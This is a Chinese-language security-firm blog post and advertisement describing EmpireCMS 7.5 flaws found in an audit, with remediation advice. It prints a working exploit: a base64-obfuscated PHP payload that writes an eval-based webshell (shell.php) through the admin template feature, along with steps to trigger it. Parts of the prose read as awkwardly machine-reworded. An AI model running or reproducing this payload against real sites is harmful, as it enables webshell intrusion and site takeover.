sine安全進行全面的黑箱安全測試，對相應的網站漏洞進行修復，對入侵的痕跡進行分析來制定相應的網站防篡改方案，對重要的登錄頁面，進行二次身份驗證。修復漏洞不單是對BUG的修復，而是跟網站緊密結合在一起，進行行之有效的安全解決方案，即要修復網站的漏洞，也要保證網站的各個功能正常使用，還要保證網站的正常運營。
近我們SINE安全在對帝國CMS系統(tǒng)進行代碼安全審計的時候，發(fā)現(xiàn)該系統(tǒng)存在漏洞，受影響的版本是EmpireCMS V7.5，從帝國下載到本地，我們人工對其代碼進行詳細的漏洞檢測與安全代碼分析。共計發(fā)現(xiàn)三個高危漏洞，都是在的后臺管理頁面上的功能發(fā)現(xiàn)的。該漏洞的產生，根源的問題是沒有對get,post提交方式進行嚴格的安全效驗與過濾，導致可以插入惡意代碼到后端服務器中去處理，導致漏洞的發(fā)生。帝國CMS系統(tǒng)，簡單給大家介紹一下，目前很多站長，以及企業(yè)建站，都在使用該套系統(tǒng)，快速，便捷，易于搜索引擎收錄，采用的是B/S架構開發(fā)，php語言+Mysql數(shù)據(jù)庫，支持大并發(fā)同時訪問，可以承載較多的用戶快速的訪問的各個頁面與內容，模板自定義化，可以設置標簽與自行設計外觀，靜態(tài)html生成，還有采集功能，深受廣大站長和運營者的喜歡。我們SINE安全技術在對該代碼進行安全檢測與滲透測試的手，會先大體看下代碼，熟悉整個的架構，數(shù)據(jù)庫配置文件，以及入口調用到的文件，通常調用到的安全規(guī)則是如何寫的，多個方面去大體的了解該代碼，目前滲透測試中，發(fā)現(xiàn)的漏洞有：SQL注入漏洞，敏感信息泄露，初始化安裝功能漏洞，直行平行越權邏輯漏洞，任意文件上傳漏洞，登錄繞過漏洞，短信驗證碼漏洞，找回密碼漏洞，數(shù)據(jù)庫備份webshell，XSS跨站,CSRF漏洞等待。
首先我們檢測到的是帝國安裝代碼功能上存在可以插入惡意代碼漏洞，在install安裝目錄下的index.php文件中，可以查到表的前綴，也就是獲取前端提交過來的參數(shù)，然后繼續(xù)往下看，data目錄下的fun.php代碼里的參數(shù)并沒有做任何的安全效驗，導致可以直接插入惡意代碼寫入到配置文件config.php中去。漏洞詳情如下圖：
后臺還存在get webshell漏洞，打開后臺管理功能頁面，選擇管理首頁模板，緊接著右鍵點擊增加首頁方案中，復制漏洞exp代碼：<?php $aa = base64_decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?>  解密base64后是：ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php寫到模板內容頁面里，左鍵點擊提交，再點擊啟用此方案，就在會e/admin/template/文件夾下生成一個shell.php文件。
關于帝國CMS漏洞的修復辦法，對所有的get,post請求做安全過濾，也可以直接在eaddslashes2的參數(shù)里增加惡意代碼的攔截機制，先檢測后放行，該漏洞的利用條件是需要有后臺管理員權限，利用的不是太多，建議對后臺的管理目錄進行更改，或者直接將管理員的密碼設置的復雜一些。如果您對漏洞修復不是太懂的話，也可以找專業(yè)的安全公司來處理，國內SINE安全，啟明星辰，綠盟，都是比較不錯的，漏洞經常出現(xiàn)，也請的運營者多多關注EmpireCMS的，一有補丁就立即修復掉，將安全損失降到低。

采取正確的措施保護設備，將保護基礎架構的其他部分，其中包括下面這些經常被忽視的常見防范措施：
修改默認密碼和帳號名。
禁用不必要的服務和帳號。
保證按照制造商的要求更新底層操作系統(tǒng)和系統(tǒng)軟件。

Sinesafe安全維護服務針對與被掛，被掛黑鏈，百度快照被篡改，被入侵，被攻擊，被劫持，打開自己時，會自動跳轉到博，自動收錄一些惡意內容如（，發(fā)票，）等等的百度快照，訂單數(shù)據(jù)劫持，劫持跳轉攻擊等等情況而專門定制的安全維護服務。我們擁有多位技術精湛、專業(yè)的網絡安全工程師,從業(yè)信息安全行業(yè)10年,并且提供7x24小時的全天候安全維護服務。
安全維護范圍及內容
漏洞修復，程序代碼的安全審計，包括PHP、ASP、JSP、.NET等程序代碼的安全審計，上傳漏洞，SQL注入漏洞，身份驗證漏洞，XSS跨站漏洞，命令執(zhí)行漏洞，文件包含漏洞，權限提升漏洞等的安全審計，防篡改方案，后臺登錄二次安全驗證部署，百度風險攔截提示的解除，等惡意內容百度快照清理，以及后門木馬和程序惡意掛馬代碼的檢測和清除，源代碼及數(shù)據(jù)庫的加密和防止泄露。

從上邊的事例還可以看得出，安全實際上是必須時間去沉淀的，它創(chuàng)建在電子信息科學、電子信息技術之中，一個連編碼都寫不太好的人，實際上是沒法學精安全的。要想根據(jù)集中化學習培訓強制將知識傾泄在人的大腦中，也是不可取的方法，仿佛哪些都是了，但實際上略微深層次一些就來到盲點，由于對底層的知識是一知半解的。我舉一個簡潔明了的事例，絕大多數(shù)入門教程都是教SQL注入的判斷方法and1=1，那麼：你可以概述SQL注入漏洞的實質是啥嗎？依據(jù)系統(tǒng)漏洞情景的不一樣都有哪些種類？依據(jù)運用方法的不一樣又有那些種類？他們中什么跑數(shù)據(jù)信息更快，什么基本上適用全部狀況？出錯注入的基本原理是啥？聯(lián)合查詢注入又有什么關鍵點？黑盒子測試中怎么才能找尋SQL注入系統(tǒng)漏洞？白盒審計呢？
網站防入侵和防攻擊等問題必須由我們安全技術來解決此問題，術業(yè)有專攻。
http://www.cxftmy.com